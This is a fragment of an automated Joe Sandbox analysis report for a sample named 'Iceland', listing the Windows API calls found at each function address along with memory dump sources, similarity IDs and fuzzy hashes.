                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00AB3A29
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?), ref: 00AB3A30
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00AB3A45
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00AB3A4D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                                                                                                                                                                • String ID: SysAnimate32
                                                                                                                                                                                                                                                                • API String ID: 3529120543-1011021900
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A4508E,?,?,00A4502E,?,00AE98D8,0000000C,00A45185,?,00000002), ref: 00A450FD
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A45110
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00A4508E,?,?,00A4502E,?,00AE98D8,0000000C,00A45185,?,00000002,00000000), ref: 00A45133
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A65657,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A26610
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A26622
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,00A65657,?,?,00A262FA,?,00000001,?,?,00000000), ref: 00A26635
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                                                • API String ID: 145871493-1355242751
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A935C4
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00A93646
                                                                                                                                                                                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A9365C
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A9366D
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00A9367F
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Delete$Copy
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3226157194-0
APIs
• GetCurrentProcessId.KERNEL32 ref: 00AAAE87
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00AAAE95
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 00AAAEC8
• CloseHandle.KERNEL32(?), ref: 00AAB09D
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: Process$CloseCountersCurrentHandleOpen
• String ID:
• API String ID: 3488606520-0
APIs
  • Part of subcall function 00A2B329: _wcslen.LIBCMT ref: 00A2B333
  • Part of subcall function 00AAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AAC10E,?,?), ref: 00AAD415
  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD451
  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4C8
  • Part of subcall function 00AAD3F8: _wcslen.LIBCMT ref: 00AAD4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AAC505
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AAC560
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AAC5C3
• RegCloseKey.ADVAPI32(?,?), ref: 00AAC606
• RegCloseKey.ADVAPI32(00000000), ref: 00AAC613
Similarity
• API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
• String ID:
• API String ID: 826366716-0
APIs
  • Part of subcall function 00A8E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A8D7CD,?), ref: 00A8E714
  • Part of subcall function 00A8E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A8D7CD,?), ref: 00A8E72D
  • Part of subcall function 00A8EAB0: GetFileAttributesW.KERNEL32(?,00A8D840), ref: 00A8EAB1
• lstrcmpiW.KERNEL32(?,?), ref: 00A8ED8A
• MoveFileW.KERNEL32(?,?), ref: 00A8EDC3
• _wcslen.LIBCMT ref: 00A8EF02
• _wcslen.LIBCMT ref: 00A8EF1A
• SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00A8EF67
Similarity
• API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
• String ID:
• API String ID: 3183298772-0
APIs
• VariantInit.OLEAUT32(?), ref: 00A89534
• VariantClear.OLEAUT32 ref: 00A895A5
• VariantClear.OLEAUT32 ref: 00A89604
• VariantClear.OLEAUT32(?), ref: 00A89677
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00A896A2
Similarity
• API ID: Variant$Clear$ChangeInitType
• String ID:
• API String ID: 4136290138-0
                                                                                                                                                                                                                                                                • Opcode ID: f9ad8da60ef8cfc10e163364a025a56ae97899776bd0341e09f6f919679721cb
                                                                                                                                                                                                                                                                • Instruction ID: 733f04976fb1d617884d804954dceec96b0dd690ecc210b29d722a58ff6d2bdd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9ad8da60ef8cfc10e163364a025a56ae97899776bd0341e09f6f919679721cb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2512AB5A0061AEFCB14DF58C884EAAB7F9FF89314B158569E905DB310E734E911CF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00A995F3
                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00A9961F
                                                                                                                                                                                                                                                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00A99677
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00A9969C
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A996A4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00AA999D
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00AA9A2D
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00AA9A49
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00AA9A8F
                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00AA9AAF
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00A91A02,?,753CE610), ref: 00A3F9F1
                                                                                                                                                                                                                                                                  • Part of subcall function 00A3F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00A80354,00000000,00000000,?,?,00A91A02,?,753CE610,?,00A80354), ref: 00A3FA18
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00AB766B
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000EC,?), ref: 00AB7682
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00AB76AB
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00A9B5BE,00000000,00000000), ref: 00AB76D0
                                                                                                                                                                                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00AB76FF
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _free
APIs
• GetCursorPos.USER32(?), ref: 00A219E1
• ScreenToClient.USER32(00000000,?), ref: 00A219FE
• GetAsyncKeyState.USER32(00000001), ref: 00A21A23
• GetAsyncKeyState.USER32(00000002), ref: 00A21A3D
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• GetInputState.USER32 ref: 00A94310
• TranslateAcceleratorW.USER32(?,00000000,?), ref: 00A94367
• TranslateMessage.USER32(?), ref: 00A94390
• DispatchMessageW.USER32(?), ref: 00A9439A
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A943AB
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: Message$Translate$AcceleratorDispatchInputPeekState
• String ID:
• API String ID: 2256411358-0
APIs
• GetWindowRect.USER32(?,?), ref: 00A82262
• PostMessageW.USER32(00000001,00000201,00000001), ref: 00A8230E
• Sleep.KERNEL32(00000000,?,?,?), ref: 00A82316
• PostMessageW.USER32(00000001,00000202,00000000), ref: 00A82327
• Sleep.KERNEL32(00000000,?,?,?,?), ref: 00A8232F
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00A9CC63,00000000), ref: 00A9D97D
• InternetReadFile.WININET(?,00000000,?,?), ref: 00A9D9B4
• GetLastError.KERNEL32(?,00000000,?,?,?,00A9CC63,00000000), ref: 00A9D9F9
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00A9CC63,00000000), ref: 00A9DA0D
• SetEvent.KERNEL32(?,?,00000000,?,?,?,00A9CC63,00000000), ref: 00A9DA37
Memory Dump Source
• Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
• Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
Similarity
• API ID: EventInternet$AvailableDataErrorFileLastQueryRead
• String ID:
• API String ID: 3191363074-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00AB61E4
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00AB623C
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB624E
                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00AB6259
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00AB62B5
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 763830540-0
                                                                                                                                                                                                                                                                • Opcode ID: 8688b2966670567694f159cf0e3669079096c6dca7edaf09040fef4888d3d679
                                                                                                                                                                                                                                                                • Instruction ID: 0853ba56344cd74a86576c42e348ba8891c9ad8af61e39ee46e2e9db2ca48cf8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8688b2966670567694f159cf0e3669079096c6dca7edaf09040fef4888d3d679
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 84217175D002189AEB10DFA4CC84AEEBBBCFB44324F144256FA25EB182DB749985CF50
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00AA13AE
                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00AA13C5
                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00AA1401
                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00AA140D
                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000003), ref: 00AA1445
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                • Opcode ID: c73dd29777d6250a5da29a9ca71ac2e9312295359f0858ebde28f8efab65e59e
                                                                                                                                                                                                                                                                • Instruction ID: f06fbe70856943fc6db5c3cbc042af6f3c78adac6751cd4c56de3b3dee020def
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c73dd29777d6250a5da29a9ca71ac2e9312295359f0858ebde28f8efab65e59e
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF21A135600214AFDB04EFA9D994A9EBBF9EF48300B048539E84A97362DB30AD45DF90
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 00A5D146
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A5D169
                                                                                                                                                                                                                                                                  • Part of subcall function 00A53B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00A46A79,?,0000015D,?,?,?,?,00A485B0,000000FF,00000000,?,?), ref: 00A53BC5
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A5D18F
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A5D1A2
                                                                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00A5D1B1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                                                                                                                • Opcode ID: 67dab7769c6802c0c0a36dd44484f1426a695c80aafdbc6a943b55e660b78f88
                                                                                                                                                                                                                                                                • Instruction ID: 90df2f7480f1fb1ae6625bc435a49ebc4ce8e96e05e89d6a2ca8128785e2caf1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 67dab7769c6802c0c0a36dd44484f1426a695c80aafdbc6a943b55e660b78f88
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD018876601A157F373167BA5C4CD7B6A7DFEC2B623150329FD05CA155EA708D0582B0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: _memcmp
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2931989736-0
                                                                                                                                                                                                                                                                • Opcode ID: 1368cb796d932dc6ee450b1f69f73e3ada451171a4b53b4f259b3983042444c4
                                                                                                                                                                                                                                                                • Instruction ID: 9e90d2e10e0e1010c5fce7aec3162ac6cdcf2e65de9c5dba5c13bd711b3e7a00
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1368cb796d932dc6ee450b1f69f73e3ada451171a4b53b4f259b3983042444c4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3701D8F5644305BBF714B7209D82FAB737DAE50398F018425FD069B242E761ED50C7A9
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(0000000A,?,?,00A4F64E,00A4545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A53170
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A531A5
                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00A531CC
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A531D9
                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00A531E2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                • Opcode ID: 9246c6492661087e3462c76b400c5f2e4f34119dcff2239755028826a7820513
                                                                                                                                                                                                                                                                • Instruction ID: 75ffaa2b8e16aecea3f64f506b19c11b0e435bcb7270cb79115a406d16bd21a6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9246c6492661087e3462c76b400c5f2e4f34119dcff2239755028826a7820513
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EF01D177640E007B9E12A774AD85E2A2AA9BFD13F37200728FC1596193EF318A0E5260
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?,?,00A80C4E), ref: 00A8091B
                                                                                                                                                                                                                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80936
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80944
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?), ref: 00A80954
                                                                                                                                                                                                                                                                • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00A80831,80070057,?,?), ref: 00A80960
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2867295744.0000000000A21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A20000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867263741.0000000000A20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000ABD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867370419.0000000000AE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867450251.0000000000AED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                • Associated: 0000000A.00000002.2867486697.0000000000AF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_a20000_Iceland.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3897988419-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00A8F2AE
                                                                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?), ref: 00A8F2BC
                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00A8F2C4
                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 00A8F2CE
